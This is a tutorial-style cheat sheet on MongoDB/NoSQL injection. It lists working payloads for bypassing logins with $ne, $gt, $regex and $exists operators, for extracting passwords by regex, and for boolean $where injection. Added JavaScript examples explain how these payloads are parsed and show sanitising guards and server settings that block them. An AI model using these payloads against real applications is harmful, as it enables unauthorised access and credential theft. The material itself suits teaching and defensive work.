NoSQL Injection

Theory

NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

Practice

Authentication Bypass

Using not equal ($ne) or greater than ($gt) we can try to bypass authentication. When the body parser turns bracketed parameters into nested objects, each of these lines becomes a MongoDB operator object instead of a plain string:

username[$ne]=toto&password[$ne]=toto          #Not Equal
username[$regex]=.*&password[$regex]=.*        #Regex
username[$exists]=true&password[$exists]=true  #If Exist
username[$ne]=admin&password[$gt]=0            #Greater

Extract data

We can use a regex to determine the length of a value.

username[$regex]=.{25}&pass[$ne]=1

We can use regex to extract information.

username[$eq]=admin&password[$regex]=^p
username[$eq]=admin&password[$regex]=^pa
username[$eq]=admin&password[$regex]=^pas

username[$ne]=toto&password[$regex]=^p
username[$ne]=toto&password[$regex]=^pa
username[$ne]=toto&password[$regex]=^pas

We can use $nin (not in) when we don't want to match certain values.

# Matches none of the values in the array (not test and not admin)
username[$nin][admin]=admin&username[$nin][test]=test&password[$regex]=^p
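Every payload in the sections above works the same way: a bracketed parameter such as username[$ne]=toto is parsed into a nested object, so the "credential" the handler receives is a MongoDB operator expression rather than a string. The following example, added here and not part of the original page, reproduces that parsing step with a small stand-in for a qs-style body parser and shows the two server-side checks that close the hole: rejecting any operator key in the request body, and refusing to build the query unless both credentials are plain strings. All function names are hypothetical.

```javascript
// Added example (not from the original page): how bracket-style query
// parameters become MongoDB operator objects, and two server-side checks
// that stop operator injection. All helper names are hypothetical.

// Minimal stand-in for body parsers such as Express's "extended" qs mode:
// "a[b][c]=1" -> { a: { b: { c: "1" } } }. Values are always strings.
function parseBracketQuery(query) {
  const result = {};
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawVal = eq === -1 ? "" : pair.slice(eq + 1);
    const key = decodeURIComponent(rawKey);
    const value = decodeURIComponent(rawVal.replace(/\+/g, " "));
    // "username[$ne]" -> ["username", "$ne"]
    const path = key.replace(/\]/g, "").split("[");
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      if (typeof node[path[i]] !== "object" || node[path[i]] === null) {
        node[path[i]] = {};
      }
      node = node[path[i]];
    }
    node[path[path.length - 1]] = value;
  }
  return result;
}

// Check 1: reject any request body that carries an operator key ("$ne",
// "$regex", "$nin", ...) or a dotted key at any depth. This mirrors the
// approach taken by sanitising middleware such as express-mongo-sanitize.
function containsOperator(value) {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (value && typeof value === "object") {
    return Object.keys(value).some(
      (k) => k.startsWith("$") || k.includes(".") || containsOperator(value[k])
    );
  }
  return false;
}

// Check 2: build the filter only from values that are already strings and
// pin the comparison to $eq, so an object such as { $ne: "toto" } can never
// reach the database. (Real code compares the password against a stored
// hash; the point here is the shape of the filter.)
function buildLoginFilter(body) {
  const { username, password } = body;
  if (typeof username !== "string" || typeof password !== "string") {
    throw new TypeError("credentials must be plain strings");
  }
  return { username: { $eq: username }, password: { $eq: password } };
}

// Request-level decision a login handler can act on and log.
function classifyLogin(query) {
  const body = parseBracketQuery(query);
  if (containsOperator(body)) {
    return { accepted: false, reason: "operator key in credentials" };
  }
  try {
    return { accepted: true, filter: buildLoginFilter(body) };
  } catch (e) {
    return { accepted: false, reason: e.message };
  }
}

// Constructed sample requests: a normal login and the page's $ne bypass.
console.log(classifyLogin("username=admin&password=s3cret"));
console.log(classifyLogin("username[$ne]=toto&password[$ne]=toto"));
```

Both checks are worth keeping: the first gives you a loggable signal (an operator key in a login body is a strong detection indicator), the second protects the query even if a future parser or field slips past the first.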

MongoDB Injection

You can try boolean-based injection on MongoDB with the following payloads, which target queries that concatenate user input into a $where JavaScript expression:

, $where: '1 == 1'
$where: '1 == 1'
' || 1==1//
' || 1==1%00
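The payloads above only work when the application builds a $where clause by string concatenation, because $where hands a JavaScript expression to mongod to evaluate per document. The example below, added here and not taken from the original page, shows that vulnerable construction beside a guard that walks any filter or pipeline and refuses the operators that execute server-side JavaScript. Function and constant names are hypothetical.

```javascript
// Added example (not from the original page): the string-built $where
// clause that the payloads above break out of, beside a guard that refuses
// server-side JavaScript operators in any filter. Names are hypothetical.

// Vulnerable pattern: user input concatenated into a JavaScript expression.
// The quote in a payload closes the string literal, "||" makes the
// expression true, and "//" comments out the rest of the clause.
function buildWhereLogin(username, password) {
  return {
    $where:
      "this.username == '" + username + "' && this.password == '" + password + "'",
  };
}

// Operators that make mongod evaluate JavaScript supplied in the query.
const SERVER_SIDE_JS_OPERATORS = new Set(["$where", "$function", "$accumulator"]);

// Walk a filter (or aggregation pipeline) and collect the path of every
// server-side JavaScript operator it contains, e.g. "$and[1].$where".
function findServerSideJs(node, path = "", found = []) {
  if (Array.isArray(node)) {
    node.forEach((v, i) => findServerSideJs(v, `${path}[${i}]`, found));
  } else if (node && typeof node === "object") {
    for (const [k, v] of Object.entries(node)) {
      const p = path ? `${path}.${k}` : k;
      if (SERVER_SIDE_JS_OPERATORS.has(k)) found.push(p);
      findServerSideJs(v, p, found);
    }
  }
  return found;
}

// Gate to place in front of every find()/aggregate() call: user-controlled
// values are data, never code, so no filter should reach mongod with these.
function assertNoServerSideJs(filter) {
  const hits = findServerSideJs(filter);
  if (hits.length) {
    throw new Error("server-side JavaScript not allowed: " + hits.join(", "));
  }
  return filter;
}

// Constructed sample: the page's first boolean payload as a username.
console.log(buildWhereLogin("admin' || 1==1//", "x").$where);
console.log(findServerSideJs({ $and: [{ username: "a" }, { $where: "1==1" }] }));
```

Where the application owns the mongod configuration, the same class of bug can also be closed at the server by setting security.javascriptEnabled to false, which disables $where and the other server-side JavaScript features entirely; the guard above is the application-level equivalent for deployments that cannot change that setting.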

Resources
